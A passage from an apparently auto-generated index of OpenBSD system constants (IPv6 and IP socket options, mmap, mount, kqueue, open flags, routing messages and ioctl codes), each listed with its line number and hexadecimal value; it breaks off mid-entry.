IPV6_JOIN_GROUP (line 898) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 899) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 900) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 901) | IPV6_MAXPACKET = 0xffff constant IPV6_MINHOPCOUNT (line 902) | IPV6_MINHOPCOUNT = 0x41 constant IPV6_MMTU (line 903) | IPV6_MMTU = 0x500 constant IPV6_MULTICAST_HOPS (line 904) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 905) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 906) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 907) | IPV6_NEXTHOP = 0x30 constant IPV6_OPTIONS (line 908) | IPV6_OPTIONS = 0x1 constant IPV6_PATHMTU (line 909) | IPV6_PATHMTU = 0x2c constant IPV6_PIPEX (line 910) | IPV6_PIPEX = 0x3f constant IPV6_PKTINFO (line 911) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 912) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 913) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 914) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 915) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_RECVDSTOPTS (line 916) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVDSTPORT (line 917) | IPV6_RECVDSTPORT = 0x40 constant IPV6_RECVHOPLIMIT (line 918) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 919) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 920) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 921) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 922) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 923) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTABLE (line 924) | IPV6_RTABLE = 0x1021 constant IPV6_RTHDR (line 925) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 926) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 927) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 928) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 929) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 930) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 931) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 932) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 933) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 934) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 935) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 936) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 937) | IP_ADD_MEMBERSHIP = 0xc constant IP_AUTH_LEVEL (line 938) | IP_AUTH_LEVEL = 0x14 constant IP_DEFAULT_MULTICAST_LOOP (line 939) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 940) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 941) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 942) | IP_DROP_MEMBERSHIP = 0xd constant IP_ESP_NETWORK_LEVEL (line 943) | IP_ESP_NETWORK_LEVEL = 0x16 constant IP_ESP_TRANS_LEVEL (line 944) | IP_ESP_TRANS_LEVEL = 0x15 constant IP_HDRINCL (line 945) | IP_HDRINCL = 0x2 constant IP_IPCOMP_LEVEL (line 946) | IP_IPCOMP_LEVEL = 0x1d constant IP_IPDEFTTL (line 947) | IP_IPDEFTTL = 0x25 constant IP_IPSECFLOWINFO (line 948) | IP_IPSECFLOWINFO = 0x24 constant IP_IPSEC_LOCAL_AUTH (line 949) | IP_IPSEC_LOCAL_AUTH = 0x1b constant IP_IPSEC_LOCAL_CRED (line 950) | IP_IPSEC_LOCAL_CRED = 0x19 constant IP_IPSEC_LOCAL_ID (line 951) | IP_IPSEC_LOCAL_ID = 0x17 constant IP_IPSEC_REMOTE_AUTH (line 952) | IP_IPSEC_REMOTE_AUTH = 0x1c constant IP_IPSEC_REMOTE_CRED (line 953) | IP_IPSEC_REMOTE_CRED = 0x1a constant IP_IPSEC_REMOTE_ID (line 954) | IP_IPSEC_REMOTE_ID = 0x18 constant IP_MAXPACKET (line 955) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 956) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MF (line 957) | IP_MF = 0x2000 constant IP_MINTTL (line 958) | IP_MINTTL = 0x20 constant IP_MIN_MEMBERSHIPS (line 959) | IP_MIN_MEMBERSHIPS = 0xf constant IP_MSS (line 960) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 961) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 962) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 963) | IP_MULTICAST_TTL = 0xa constant IP_OFFMASK (line 964) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 965) | IP_OPTIONS = 0x1 constant IP_PIPEX (line 966) | IP_PIPEX = 0x22 constant IP_PORTRANGE (line 967) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 968) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 969) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 970) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 971) | IP_RECVDSTADDR = 0x7 constant IP_RECVDSTPORT (line 972) | IP_RECVDSTPORT = 0x21 constant IP_RECVIF (line 973) | IP_RECVIF = 0x1e constant IP_RECVOPTS (line 974) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 975) | IP_RECVRETOPTS = 0x6 constant IP_RECVRTABLE (line 976) | IP_RECVRTABLE = 0x23 constant IP_RECVTTL (line 977) | IP_RECVTTL = 0x1f constant IP_RETOPTS (line 978) | IP_RETOPTS = 0x8 constant IP_RF (line 979) | IP_RF = 0x8000 constant IP_RTABLE (line 980) | IP_RTABLE = 0x1021 constant IP_SENDSRCADDR (line 981) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 982) | IP_TOS = 0x3 constant IP_TTL (line 983) | IP_TTL = 0x4 constant ISIG (line 984) | ISIG = 0x80 constant ISTRIP (line 985) | ISTRIP = 0x20 constant ITIMER_PROF (line 986) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 987) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 988) | ITIMER_VIRTUAL = 0x1 constant IUCLC (line 989) | IUCLC = 0x1000 constant IXANY (line 990) | IXANY = 0x800 constant IXOFF (line 991) | IXOFF = 0x400 constant IXON (line 992) | IXON = 0x200 constant KERN_HOSTNAME (line 993) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 994) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 995) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 996) | KERN_VERSION = 0x4 constant LCNT_OVERLOAD_FLUSH (line 997) | LCNT_OVERLOAD_FLUSH = 0x6 constant LOCK_EX (line 998) | LOCK_EX = 0x2 constant LOCK_NB (line 999) | LOCK_NB = 0x4 constant LOCK_SH (line 1000) | LOCK_SH = 0x1 constant LOCK_UN (line 1001) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 1002) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1003) | MADV_FREE = 0x6 constant MADV_NORMAL (line 1004) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 1005) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1006) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 1007) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 1008) | MADV_WILLNEED = 0x3 constant MAP_ANON (line 1009) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1010) | MAP_ANONYMOUS = 0x1000 constant MAP_CONCEAL (line 1011) | MAP_CONCEAL = 0x8000 constant MAP_COPY (line 1012) | MAP_COPY = 0x2 constant MAP_FILE (line 1013) | MAP_FILE = 0x0 constant MAP_FIXED (line 1014) | MAP_FIXED = 0x10 constant MAP_FLAGMASK (line 1015) | MAP_FLAGMASK = 0xfff7 constant MAP_HASSEMAPHORE (line 1016) | MAP_HASSEMAPHORE = 0x0 constant MAP_INHERIT (line 1017) | MAP_INHERIT = 0x0 constant MAP_INHERIT_COPY (line 1018) | MAP_INHERIT_COPY = 0x1 constant MAP_INHERIT_NONE (line 1019) | MAP_INHERIT_NONE = 0x2 constant MAP_INHERIT_SHARE (line 1020) | MAP_INHERIT_SHARE = 0x0 constant MAP_INHERIT_ZERO (line 1021) | MAP_INHERIT_ZERO = 0x3 constant MAP_NOEXTEND (line 1022) | MAP_NOEXTEND = 0x0 constant MAP_NORESERVE (line 1023) | MAP_NORESERVE = 0x0 constant MAP_PRIVATE (line 1024) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 1025) | MAP_RENAME = 0x0 constant MAP_SHARED (line 1026) | MAP_SHARED = 0x1 constant MAP_STACK (line 1027) | MAP_STACK = 0x4000 constant MAP_TRYFIXED (line 1028) | MAP_TRYFIXED = 0x0 constant MCL_CURRENT (line 1029) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1030) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 1031) | MNT_ASYNC = 0x40 constant MNT_DEFEXPORTED (line 1032) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1033) | MNT_DELEXPORT = 0x20000 constant MNT_DOOMED (line 1034) | MNT_DOOMED = 0x8000000 constant MNT_EXPORTANON (line 1035) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1036) | MNT_EXPORTED = 0x100 constant MNT_EXRDONLY (line 1037) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 1038) | MNT_FORCE = 0x80000 constant MNT_LAZY (line 1039) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1040) | MNT_LOCAL = 0x1000 constant MNT_NOATIME (line 1041) | MNT_NOATIME = 0x8000 constant MNT_NODEV (line 1042) | MNT_NODEV = 0x10 constant MNT_NOEXEC (line 1043) | MNT_NOEXEC = 0x4 constant MNT_NOPERM (line 1044) | MNT_NOPERM = 0x20 constant MNT_NOSUID (line 1045) | MNT_NOSUID = 0x8 constant MNT_NOWAIT (line 1046) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1047) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1048) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1049) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1050) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 1051) | MNT_SOFTDEP = 0x4000000 constant MNT_STALLED (line 1052) | MNT_STALLED = 0x100000 constant MNT_SWAPPABLE (line 1053) | MNT_SWAPPABLE = 0x200000 constant MNT_SYNCHRONOUS (line 1054) | MNT_SYNCHRONOUS = 0x2 constant MNT_UPDATE (line 1055) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1056) | MNT_VISFLAGMASK = 0x400ffff constant MNT_WAIT (line 1057) | MNT_WAIT = 0x1 constant MNT_WANTRDWR (line 1058) | MNT_WANTRDWR = 0x2000000 constant MNT_WXALLOWED (line 1059) | MNT_WXALLOWED = 0x800 constant MOUNT_AFS (line 1060) | MOUNT_AFS = "afs" constant MOUNT_CD9660 (line 1061) | MOUNT_CD9660 = "cd9660" constant MOUNT_EXT2FS (line 1062) | MOUNT_EXT2FS = "ext2fs" constant MOUNT_FFS (line 1063) | MOUNT_FFS = "ffs" constant MOUNT_FUSEFS (line 1064) | MOUNT_FUSEFS = "fuse" constant MOUNT_MFS (line 1065) | MOUNT_MFS = "mfs" constant MOUNT_MSDOS (line 1066) | MOUNT_MSDOS = "msdos" constant MOUNT_NCPFS (line 1067) | MOUNT_NCPFS = "ncpfs" constant MOUNT_NFS (line 1068) | MOUNT_NFS = "nfs" constant MOUNT_NTFS (line 1069) | MOUNT_NTFS = "ntfs" constant MOUNT_TMPFS (line 1070) | MOUNT_TMPFS = "tmpfs" constant MOUNT_UDF (line 1071) | MOUNT_UDF = "udf" constant MOUNT_UFS (line 1072) | MOUNT_UFS = "ffs" constant MSG_BCAST (line 1073) | MSG_BCAST = 0x100 constant MSG_CMSG_CLOEXEC (line 1074) | MSG_CMSG_CLOEXEC = 0x800 constant MSG_CTRUNC (line 1075) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1076) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1077) | MSG_DONTWAIT = 0x80 constant MSG_EOR (line 1078) | MSG_EOR = 0x8 constant MSG_MCAST (line 1079) | MSG_MCAST = 0x200 constant MSG_NOSIGNAL (line 1080) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1081) | MSG_OOB = 0x1 constant MSG_PEEK (line 1082) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1083) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1084) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 1085) | MSG_WAITFORONE = 0x1000 constant MS_ASYNC (line 1086) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1087) | MS_INVALIDATE = 0x4 constant MS_SYNC (line 1088) | MS_SYNC = 0x2 constant NAME_MAX (line 1089) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1090) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1091) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1092) | NET_RT_IFLIST = 0x3 constant NET_RT_IFNAMES (line 1093) | NET_RT_IFNAMES = 0x6 constant NET_RT_MAXID (line 1094) | NET_RT_MAXID = 0x8 constant NET_RT_SOURCE (line 1095) | NET_RT_SOURCE = 0x7 constant NET_RT_STATS (line 1096) | NET_RT_STATS = 0x4 constant NET_RT_TABLE (line 1097) | NET_RT_TABLE = 0x5 constant NFDBITS (line 1098) | NFDBITS = 0x20 constant NOFLSH (line 1099) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1100) | NOKERNINFO = 0x2000000 constant NOTE_ATTRIB (line 1101) | NOTE_ATTRIB = 0x8 constant NOTE_CHANGE (line 1102) | NOTE_CHANGE = 0x1 constant NOTE_CHILD (line 1103) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1104) | NOTE_DELETE = 0x1 constant NOTE_EOF (line 1105) | NOTE_EOF = 0x2 constant NOTE_EXEC (line 1106) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1107) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1108) | NOTE_EXTEND = 0x4 constant NOTE_FORK (line 1109) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1110) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1111) | NOTE_LOWAT = 0x1 constant NOTE_OOB (line 1112) | NOTE_OOB = 0x4 constant NOTE_PCTRLMASK (line 1113) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1114) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1115) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1116) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1117) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1118) | NOTE_TRACKERR = 0x2 constant NOTE_TRUNCATE (line 1119) | NOTE_TRUNCATE = 0x80 constant NOTE_WRITE (line 1120) | NOTE_WRITE = 0x2 constant OCRNL (line 1121) | OCRNL = 0x10 constant OLCUC (line 1122) | OLCUC = 0x20 constant ONLCR (line 1123) | ONLCR = 0x2 constant ONLRET (line 1124) | ONLRET = 0x80 constant ONOCR (line 1125) | ONOCR = 0x40 constant ONOEOT (line 1126) | ONOEOT = 0x8 constant OPOST (line 1127) | OPOST = 0x1 constant OXTABS (line 1128) | OXTABS = 0x4 constant O_ACCMODE (line 1129) | O_ACCMODE = 0x3 constant O_APPEND (line 1130) | O_APPEND = 0x8 constant O_ASYNC (line 1131) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1132) | O_CLOEXEC = 0x10000 constant O_CREAT (line 1133) | O_CREAT = 0x200 constant O_DIRECTORY (line 1134) | O_DIRECTORY = 0x20000 constant O_DSYNC (line 1135) | O_DSYNC = 0x80 constant O_EXCL (line 1136) | O_EXCL = 0x800 constant O_EXLOCK (line 1137) | O_EXLOCK = 0x20 constant O_FSYNC (line 1138) | O_FSYNC = 0x80 constant O_NDELAY (line 1139) | O_NDELAY = 0x4 constant O_NOCTTY (line 1140) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1141) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1142) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1143) | O_RDONLY = 0x0 constant O_RDWR (line 1144) | O_RDWR = 0x2 constant O_RSYNC (line 1145) | O_RSYNC = 0x80 constant O_SHLOCK (line 1146) | O_SHLOCK = 0x10 constant O_SYNC (line 1147) | O_SYNC = 0x80 constant O_TRUNC (line 1148) | O_TRUNC = 0x400 constant O_WRONLY (line 1149) | O_WRONLY = 0x1 constant PARENB (line 1150) | PARENB = 0x1000 constant PARMRK (line 1151) | PARMRK = 0x8 constant PARODD (line 1152) | PARODD = 0x2000 constant PENDIN (line 1153) | PENDIN = 0x20000000 constant PF_FLUSH (line 1154) | PF_FLUSH = 0x1 constant PRIO_PGRP (line 1155) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1156) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1157) | PRIO_USER = 0x2 constant PROT_EXEC (line 1158) | PROT_EXEC = 0x4 constant PROT_NONE (line 1159) | PROT_NONE = 0x0 constant PROT_READ (line 1160) | PROT_READ = 0x1 constant PROT_WRITE (line 1161) | PROT_WRITE = 0x2 constant RLIMIT_CORE (line 1162) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1163) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1164) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1165) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1166) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1167) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1168) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1169) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1170) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1171) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1172) | RTAX_AUTHOR = 0x6 constant RTAX_BFD (line 1173) | RTAX_BFD = 0xb constant RTAX_BRD (line 1174) | RTAX_BRD = 0x7 constant RTAX_DNS (line 1175) | RTAX_DNS = 0xc constant RTAX_DST (line 1176) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1177) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1178) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1179) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1180) | RTAX_IFP = 0x4 constant RTAX_LABEL (line 1181) | RTAX_LABEL = 0xa constant RTAX_MAX (line 1182) | RTAX_MAX = 0xf constant RTAX_NETMASK (line 1183) | RTAX_NETMASK = 0x2 constant RTAX_SEARCH (line 1184) | RTAX_SEARCH = 0xe constant RTAX_SRC (line 1185) | RTAX_SRC = 0x8 constant RTAX_SRCMASK (line 1186) | RTAX_SRCMASK = 0x9 constant RTAX_STATIC (line 1187) | RTAX_STATIC = 0xd constant RTA_AUTHOR (line 1188) | RTA_AUTHOR = 0x40 constant RTA_BFD (line 1189) | RTA_BFD = 0x800 constant RTA_BRD (line 1190) | RTA_BRD = 0x80 constant RTA_DNS (line 1191) | RTA_DNS = 0x1000 constant RTA_DST (line 1192) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1193) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1194) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1195) | RTA_IFA = 0x20 constant RTA_IFP (line 1196) | RTA_IFP = 0x10 constant RTA_LABEL (line 1197) | RTA_LABEL = 0x400 constant RTA_NETMASK (line 1198) | RTA_NETMASK = 0x4 constant RTA_SEARCH (line 1199) | RTA_SEARCH = 0x4000 constant RTA_SRC (line 1200) | RTA_SRC = 0x100 constant RTA_SRCMASK (line 1201) | RTA_SRCMASK = 0x200 constant RTA_STATIC (line 1202) | RTA_STATIC = 0x2000 constant RTF_ANNOUNCE (line 1203) | RTF_ANNOUNCE = 0x4000 constant RTF_BFD (line 1204) | RTF_BFD = 0x1000000 constant RTF_BLACKHOLE (line 1205) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1206) | RTF_BROADCAST = 0x400000 constant RTF_CACHED (line 1207) | RTF_CACHED = 0x20000 constant RTF_CLONED (line 1208) | RTF_CLONED = 0x10000 constant RTF_CLONING (line 1209) | RTF_CLONING = 0x100 constant RTF_CONNECTED (line 1210) | RTF_CONNECTED = 0x800000 constant RTF_DONE (line 1211) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1212) | RTF_DYNAMIC = 0x10 constant RTF_FMASK (line 1213) | RTF_FMASK = 0x110fc08 constant RTF_GATEWAY (line 1214) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1215) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1216) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1217) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1218) | RTF_MODIFIED = 0x20 constant RTF_MPATH (line 1219) | RTF_MPATH = 0x40000 constant RTF_MPLS (line 1220) | RTF_MPLS = 0x100000 constant RTF_MULTICAST (line 1221) | RTF_MULTICAST = 0x200 constant RTF_PERMANENT_ARP (line 1222) | RTF_PERMANENT_ARP = 0x2000 constant RTF_PROTO1 (line 1223) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1224) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1225) | RTF_PROTO3 = 0x2000 constant RTF_REJECT (line 1226) | RTF_REJECT = 0x8 constant RTF_STATIC (line 1227) | RTF_STATIC = 0x800 constant RTF_UP (line 1228) | RTF_UP = 0x1 constant RTF_USETRAILERS (line 1229) | RTF_USETRAILERS = 0x8000 constant RTM_80211INFO (line 1230) | RTM_80211INFO = 0x15 constant RTM_ADD (line 1231) | RTM_ADD = 0x1 constant RTM_BFD (line 1232) | RTM_BFD = 0x12 constant RTM_CHANGE (line 1233) | RTM_CHANGE = 0x3 constant RTM_CHGADDRATTR (line 1234) | RTM_CHGADDRATTR = 0x14 constant RTM_DELADDR (line 1235) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1236) | RTM_DELETE = 0x2 constant RTM_DESYNC (line 1237) | RTM_DESYNC = 0x10 constant RTM_GET (line 1238) | RTM_GET = 0x4 constant RTM_IFANNOUNCE (line 1239) | RTM_IFANNOUNCE = 0xf constant RTM_IFINFO (line 1240) | RTM_IFINFO = 0xe constant RTM_INVALIDATE (line 1241) | RTM_INVALIDATE = 0x11 constant RTM_LOSING (line 1242) | RTM_LOSING = 0x5 constant RTM_MAXSIZE (line 1243) | RTM_MAXSIZE = 0x800 constant RTM_MISS (line 1244) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1245) | RTM_NEWADDR = 0xc constant RTM_PROPOSAL (line 1246) | RTM_PROPOSAL = 0x13 constant RTM_REDIRECT (line 1247) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1248) | RTM_RESOLVE = 0xb constant RTM_SOURCE (line 1249) | RTM_SOURCE = 0x16 constant RTM_VERSION (line 1250) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1251) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1252) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1253) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1254) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1255) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1256) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1257) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1258) | RTV_SSTHRESH = 0x20 constant RT_TABLEID_BITS (line 1259) | RT_TABLEID_BITS = 0x8 constant RT_TABLEID_MASK (line 1260) | RT_TABLEID_MASK = 0xff constant RT_TABLEID_MAX (line 1261) | RT_TABLEID_MAX = 0xff constant RUSAGE_CHILDREN (line 1262) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1263) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1264) | RUSAGE_THREAD = 0x1 constant SCM_RIGHTS (line 1265) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1266) | SCM_TIMESTAMP = 0x4 constant SEEK_CUR (line 1267) | SEEK_CUR = 0x1 constant SEEK_END (line 1268) | SEEK_END = 0x2 constant SEEK_SET (line 1269) | SEEK_SET = 0x0 constant SHUT_RD (line 1270) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1271) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1272) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1273) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1274) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1275) | SIOCAIFGROUP = 0x80286987 constant SIOCATMARK (line 1276) | SIOCATMARK = 0x40047307 constant SIOCBRDGADD (line 1277) | SIOCBRDGADD = 0x8060693c constant SIOCBRDGADDL (line 1278) | SIOCBRDGADDL = 0x80606949 constant SIOCBRDGADDS (line 1279) | SIOCBRDGADDS = 0x80606941 constant SIOCBRDGARL (line 1280) | SIOCBRDGARL = 0x808c694d constant SIOCBRDGDADDR (line 1281) | SIOCBRDGDADDR = 0x81286947 constant SIOCBRDGDEL (line 1282) | SIOCBRDGDEL = 0x8060693d constant SIOCBRDGDELS (line 1283) | SIOCBRDGDELS = 0x80606942 constant SIOCBRDGFLUSH (line 1284) | SIOCBRDGFLUSH = 0x80606948 constant SIOCBRDGFRL (line 1285) | SIOCBRDGFRL = 0x808c694e constant SIOCBRDGGCACHE (line 1286) | SIOCBRDGGCACHE = 0xc0146941 constant SIOCBRDGGFD (line 1287) | SIOCBRDGGFD = 0xc0146952 constant SIOCBRDGGHT (line 1288) | SIOCBRDGGHT = 0xc0146951 constant SIOCBRDGGIFFLGS (line 1289) | SIOCBRDGGIFFLGS = 0xc060693e constant SIOCBRDGGMA (line 1290) | SIOCBRDGGMA = 0xc0146953 constant SIOCBRDGGPARAM (line 1291) | SIOCBRDGGPARAM = 0xc0406958 constant SIOCBRDGGPRI (line 1292) | SIOCBRDGGPRI = 0xc0146950 constant SIOCBRDGGRL (line 1293) | SIOCBRDGGRL = 0xc030694f constant SIOCBRDGGTO (line 1294) | SIOCBRDGGTO = 0xc0146946 constant SIOCBRDGIFS (line 1295) | SIOCBRDGIFS = 0xc0606942 constant SIOCBRDGRTS (line 1296) | SIOCBRDGRTS = 0xc0206943 constant SIOCBRDGSADDR (line 1297) | SIOCBRDGSADDR = 0xc1286944 constant SIOCBRDGSCACHE (line 1298) | SIOCBRDGSCACHE = 0x80146940 constant SIOCBRDGSFD (line 1299) | SIOCBRDGSFD = 0x80146952 constant SIOCBRDGSHT (line 1300) | SIOCBRDGSHT = 0x80146951 constant SIOCBRDGSIFCOST (line 1301) | SIOCBRDGSIFCOST = 0x80606955 constant SIOCBRDGSIFFLGS (line 1302) | SIOCBRDGSIFFLGS = 0x8060693f constant SIOCBRDGSIFPRIO (line 1303) | SIOCBRDGSIFPRIO = 0x80606954 constant SIOCBRDGSIFPROT (line 1304) | SIOCBRDGSIFPROT = 0x8060694a constant SIOCBRDGSMA (line 1305) | SIOCBRDGSMA = 0x80146953 constant SIOCBRDGSPRI (line 1306) | SIOCBRDGSPRI = 0x80146950 constant SIOCBRDGSPROTO (line 1307) | SIOCBRDGSPROTO = 0x8014695a constant SIOCBRDGSTO (line 1308) | SIOCBRDGSTO = 0x80146945 constant SIOCBRDGSTXHC (line 1309) | SIOCBRDGSTXHC = 0x80146959 constant SIOCDELLABEL (line 1310) | SIOCDELLABEL = 0x80206997 constant SIOCDELMULTI (line 1311) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1312) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1313) | SIOCDIFGROUP = 0x80286989 constant SIOCDIFPARENT (line 1314) | SIOCDIFPARENT = 0x802069b4 constant SIOCDIFPHYADDR (line 1315) | SIOCDIFPHYADDR = 0x80206949 constant SIOCDPWE3NEIGHBOR (line 1316) | SIOCDPWE3NEIGHBOR = 0x802069de constant SIOCDVNETID (line 1317) | SIOCDVNETID = 0x802069af constant SIOCGETKALIVE (line 1318) | SIOCGETKALIVE = 0xc01869a4 constant SIOCGETLABEL (line 1319) | SIOCGETLABEL = 0x8020699a constant SIOCGETMPWCFG (line 1320) | SIOCGETMPWCFG 